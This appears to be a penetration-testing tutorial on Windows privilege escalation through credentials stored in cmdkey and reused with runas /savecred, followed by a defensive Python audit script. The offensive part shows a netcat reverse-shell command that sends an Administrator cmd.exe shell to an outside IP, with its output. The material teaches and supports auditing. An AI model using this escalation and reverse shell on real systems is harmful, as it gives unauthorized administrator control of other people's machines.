Credentials stored on a Windows system let a user run commands as the account those credentials belong to. If an administrator has saved credentials, think of it like sudo for Windows.
Check for stored credentials with cmdkey /list:
C:\Users\security>cmdkey /list

Currently stored credentials:

    Target: Domain:interactive=ACCESS\Administrator
    Type: Domain Password
    User: ACCESS\Administrator
To run commands using the stored credentials there is a program included with Windows called "runas.exe" located in System32. It is always best to use the full path to these executables to ensure we are executing the correct file and not a different binary picked up through a PATH entry. The /savecred switch tells runas to use the credential saved under the Domain:interactive=<user> target, which is exactly the entry cmdkey listed above.
Example running Netcat as Administrator:
C:\temp>C:\Windows\System32\runas.exe /user:ACCESS\Administrator /savecred "nc.exe 10.10.14.27 4444 -e cmd.exe"
connect to [10.10.14.27] from (UNKNOWN) [10.10.10.98] 49161
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
access\administrator
cmdkey /list is an excellent check to add to your post-exploitation enumeration checklist. It is just like running sudo -l to hunt for a quick win.
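The same check works from the defensive side: an auditor or hardening script can parse the output of cmdkey /list and flag any Domain:interactive entry saved for a privileged account, since those are the only entries runas /savecred can consume. The script below is an added example written for this page, not code from the original post; the sample cmdkey output is constructed, and the account-name patterns used to decide what counts as "privileged" are an assumption to tune per environment.

```python
"""Audit `cmdkey /list` output for stored credentials that runas /savecred could use.

Added example for this page; the sample output below is constructed, not captured.
"""
from __future__ import annotations

import re
import subprocess
from dataclasses import dataclass

# Constructed sample of `cmdkey /list` output (three entries, one of them risky).
SAMPLE_CMDKEY_OUTPUT = """
Currently stored credentials:

    Target: Domain:interactive=ACCESS\\Administrator
    Type: Domain Password
    User: ACCESS\\Administrator

    Target: LegacyGeneric:target=git:https://github.com
    Type: Generic
    User: jdoe

    Target: Domain:target=fileserver01
    Type: Domain Password
    User: ACCESS\\svc_backup
"""

# Assumption: which account names are treated as privileged is site-specific.
PRIVILEGED_PATTERNS = (r"^administrator$", r"admin", r"^svc_")


@dataclass
class StoredCredential:
    target: str
    cred_type: str
    user: str

    @property
    def allows_runas(self) -> bool:
        # runas /savecred only consumes entries stored under
        # "Domain:interactive=<user>"; other targets are used for network
        # authentication (SMB shares, RDP, ...), not for spawning a local process.
        return self.target.lower().startswith("domain:interactive=")


def parse_cmdkey_output(text: str) -> list[StoredCredential]:
    """Parse the Target/Type/User triples printed by `cmdkey /list`.

    Returns an empty list for the "* NONE *" case or any text without entries.
    """
    creds: list[StoredCredential] = []
    fields: dict[str, str] = {}
    for line in text.splitlines():
        m = re.match(r"\s*(Target|Type|User):\s*(.*?)\s*$", line)
        if not m:
            continue
        key, value = m.group(1), m.group(2)
        if key == "Target" and fields:
            # A new entry starts: flush the previous one (User may be absent).
            creds.append(StoredCredential(fields.get("Target", ""),
                                          fields.get("Type", ""),
                                          fields.get("User", "")))
            fields = {}
        fields[key] = value
    if fields:
        creds.append(StoredCredential(fields.get("Target", ""),
                                      fields.get("Type", ""),
                                      fields.get("User", "")))
    return creds


def looks_privileged(user: str) -> bool:
    """Match the account part of DOMAIN\\user against PRIVILEGED_PATTERNS."""
    account = user.rsplit("\\", 1)[-1]
    return any(re.search(p, account, re.IGNORECASE) for p in PRIVILEGED_PATTERNS)


def find_runas_risks(text: str) -> list[StoredCredential]:
    """Stored credentials that runas /savecred could use for a privileged account."""
    return [c for c in parse_cmdkey_output(text)
            if c.allows_runas and looks_privileged(c.user)]


def audit_local_host() -> list[StoredCredential]:
    """Run cmdkey /list on this Windows host and audit it (needs cmdkey on PATH)."""
    out = subprocess.run(["cmdkey", "/list"], capture_output=True,
                         text=True, check=True).stdout
    return find_runas_risks(out)


if __name__ == "__main__":
    for cred in find_runas_risks(SAMPLE_CMDKEY_OUTPUT):
        print(f"[!] {cred.user} stored as {cred.target} ({cred.cred_type}); "
              f"remove with: cmdkey /delete:{cred.target}")
```

Run it as-is to audit the constructed sample, or call audit_local_host() on a Windows machine to audit the current user's own store (each user's saved credentials are only visible from that user's session). Flagged entries can be removed with cmdkey /delete:<target>, and the GPO "Network access: Do not allow storage of passwords and credentials for network authentication" prevents new ones from being saved.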